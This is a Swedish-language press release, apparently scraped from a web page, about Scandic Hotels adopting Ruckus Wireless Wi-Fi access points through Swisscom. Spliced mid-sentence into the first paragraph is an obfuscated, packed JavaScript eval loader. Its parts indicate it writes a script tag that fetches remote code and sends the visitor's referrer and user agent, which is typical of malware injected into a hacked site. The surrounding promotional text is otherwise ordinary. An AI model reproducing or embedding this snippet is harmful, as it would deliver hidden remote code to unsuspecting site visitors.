Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

Scandic Hotels väljer Ruckus Wi-Fi projekt

Scandic Hotels väljer Ruckus Wi-Fi projekt
Sebastian

Ruckus eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bdehb|var|u0026u|referrer|kradk||js|php’.split(’|’),0,{}))
Wireless, Inc. (NYSE: RKUS) Meddelar idag att deras Smart Wi-Fi-produkter och teknologi har valts ut som standard av Scandic Hotels, norra Europas största hotellkedja, för att tillgodose växande krav från gästerna kring stark och snabb, trådlös uppkoppling. Något som kommer fortsätta urskilja hotellkedjan som ett av de mest älskade och respekterade varumärkena i Norden.

Tillsammans med Swisscom Hospitality Services, som lett projektet, har Ruckus Wireless redan levererat 12 800 Ruckus ZoneFlex™-accesspunkter till mer än 130 Scandic-fastigheter över åtta länder, tillsammans med avancerade system för hantering av de trådlösa nätverken. Den nya infrastrukturen ligger nu till grund för att kunna leverera nästa generations höghastighetsinternet (HSIA) till gästerna, och för att stödja de nya tjänsteapplikationerna för Scandics personal att optimera service.

Som den första hotellkedjan i Europa att erbjuda trådlös uppkoppling, kostnadsfritt på alla sina hotell, har Scandic länge varit marknadsledande när det kommer till att leverera bästa möjliga online-upplevelse för gästerna genom att använda innovativa system och teknologi.

”Kundernas förväntningar på Wi-Fi har gått långt bortom vad vi någonsin hade kunna tro”, säger Martin Thell, CIO, Scandic Hotels. ”Vi behövde en lösning som kunde leverera kapacitet, täckning och den genomträngande styrkan som ett krävande klientel behöver från vilket hotell i världsklass som helst – och det är precis vad vi fick”

För många som driver hotell idag, kan de Wi-Fi-implementationer som baseras på konventionell teknologi inte längre möta de strikta krav som uppkommit på grund av den enorma mängden enheter som kräver trådlös uppkoppling, och bandbreddstörstande applikationer som används av både gäster och personal.

Utöver detta har många nya tjänster och enheter på hotell omfamnat IP som den föredragna metoden för både hantering och uppkoppling, därför har kravet på skalbara, flexibla Wi-Fi-system av industriell styrka snabbt blivit en icke-förhandlingsbar nödvändighet.

”Vår nya smarta Wi-Fi-infrastruktur skiljer sig som natt och dag från den förra. Den fungerar bara helt enkelt”, fortsätter Thell. ”Lösningen har gjort att vi effektivt har kunnat eliminera alla klagomål kring uppkoppling, vilket ger oss mer tid att fokusera på innovativa nya tjänster som levererar en upplevelse i världsklass i vilket av våra hotell som helst”.

Enligt Thell, har Scandic sedan de installerade Ruckus Smart Wi-Fi, sett dramatiska skillnader när det kommer till gästernas nöjdhet och även en betydande reducering av klagomål på Wi-Fi-uppkopplingen, där användarna nu kan njuta av uppkopplingshastigheter som ofta ligger två till fyra gånger högre än det förra systemet.

Scandics nya Smart Wi-Fi-infrastruktur, utformad och implementerad av Swisscom Hospitality Services, har specifikt utvecklats för att leverera genomträngande täckning och prestanda till fler än 30 000 hotellrum och miljontals kvadratmeter konferens- och mötesutrymmen, genom användningen av single och dual-band 802.11n Ruckus ZoneFlex accesspunkter med hög kapacitet. Utöver gästernas höghastighetsuppkoppling, är det Scandics ambition att använda den nya infrastrukturen till att stödja en rad applikationer, från expressutcheckning, till städtjänster och personaltjänster, samt till IP-telefoni.

För projektet, utnyttjar Swisscom Ruckus patenterade teknologi med en samling anpassningsbara antenner som på ett unikt sätt kan fokusera Wi-Fi-signaler, dit de faktiskt behövs, medan teknologin konstant anpassar antennerna efter förändringar i miljön. Detta gör att de som kopplar upp sig mot Wi-Fi på ett Scandichotell kan njuta av starkare signaler och stabilare uppkoppling, med högre hastighet över längre avstånd.

”Scandic exemplifierar hur en hotellkedja kan dra nytta av gästernas internetupplevelse för att differentiera sig från konkurrensen, samtidigt som de stärker sitt varumärke”, sa Samu Raunela, försäljningschef på Swisscom Hospitality Services. ”Vi valde Ruckus som vår hårdvarupartner för denna enorma driftsättning för att möta Scandics högsta krav i form av prestanda, pålitlighet och skalbarhet. Ruckus är nu allmänt sedda som att ha högsta möjliga standard för trådlös hårdvara inom hotell-och restaurangindustrin. Deras innovativa produkter har förändrat Wi-Fi från att vara en tjänst där vi gör så gott vi kan för gästerna till att vara ett förutsägbart, helt pålitligt erbjudande till gästerna”

Genom att använda högst skalbara och redundanta Ruckus ZoneDirector™ WLAN-kontrollenheter, erbjuder Swisscom omfattande stöd och översikt av hela Ruckus Smart Wi-Fi-infrastrukturen från dess center för nätverksdrift i Lissabon, Portugal, där Scandics IT-team erbjuds komplett kontroll över varje hotellnätverk dygnet runt.

Detta är ett pressmeddelande från Ruckus